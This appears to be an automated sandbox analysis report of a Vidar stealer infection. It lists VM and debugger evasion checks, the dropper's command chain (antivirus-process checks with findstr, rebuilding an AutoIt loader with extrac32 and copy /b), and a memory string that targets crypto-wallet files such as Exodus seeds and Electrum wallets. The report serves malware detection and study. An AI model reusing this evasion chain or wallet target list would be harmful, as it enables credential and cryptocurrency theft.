Source: C:\Windows\System32\svchost.exe TID: 5004	Thread sleep time: -30000s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\findstr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\findstr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_00406301 FindFirstFileW,FindClose,	5_2_00406301
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00406CC7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_0090DC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0091A087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0091A1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	18_2_0090E472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	18_2_0091A570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_009166DC FindFirstFileW,FindNextFileW,FindClose,	18_2_009166DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008DC622 FindFirstFileExW,	18_2_008DC622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_009173D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	18_2_009173D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00917333 FindFirstFileW,FindClose,	18_2_00917333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_0090D921

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008A5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

18_2_008A5FC8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: powershell.exe, 00000000.00000002.1984512408.000001D06B48D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: powershell.exe, 00000000.00000002.1984512408.000001D06B44F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1984512408.000001D06B48D000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004C31000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3022739178.0000028F6025A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3021193395.0000028F5AC2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: putt.exe, 00000005.00000002.1948704939.000000000090E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0091F4FF BlockInput,

18_2_0091F4FF

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008A338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

18_2_008A338B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 5_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

5_2_00406328

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008C5058 mov eax, dword ptr fs:[00000030h]

18_2_008C5058

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_009020AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

18_2_009020AA

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008D2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_008D2992
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_008C0BAF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C0D45 SetUnhandledExceptionFilter,	18_2_008C0D45
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_008C0F91

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: Inf.com PID: 8144, type: MEMORYSTR

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

18_2_00901B4D

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008A338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

18_2_008A338B

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0090BBED SendInput,keybd_event,

18_2_0090BBED

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0090EC9E mouse_event,

18_2_0090EC9E

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

18_2_009014AE

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_00901FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

18_2_00901FB0

Source: Inf.com, 00000012.00000002.3020336128.0000000000963000.00000002.00000001.01000000.0000000D.sdmp, Name.14.dr, Inf.com.7.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Inf.com	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008C0A08 cpuid

18_2_008C0A08

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008FE5F4 GetLocalTime,

18_2_008FE5F4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008FE652 GetUserNameW,

18_2_008FE652

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008DBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

18_2_008DBCD2

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 5_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

5_2_00406831

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 18.2.Inf.com.390000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351446315.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351511068.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351416495.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3022504782.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3019523263.0000000000391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351644907.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Inf.com PID: 8144, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Inf.com, 00000012.00000002.3020527913.0000000001400000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: electrum.*
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Inf.com, 00000012.00000002.3019523263.000000000053C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
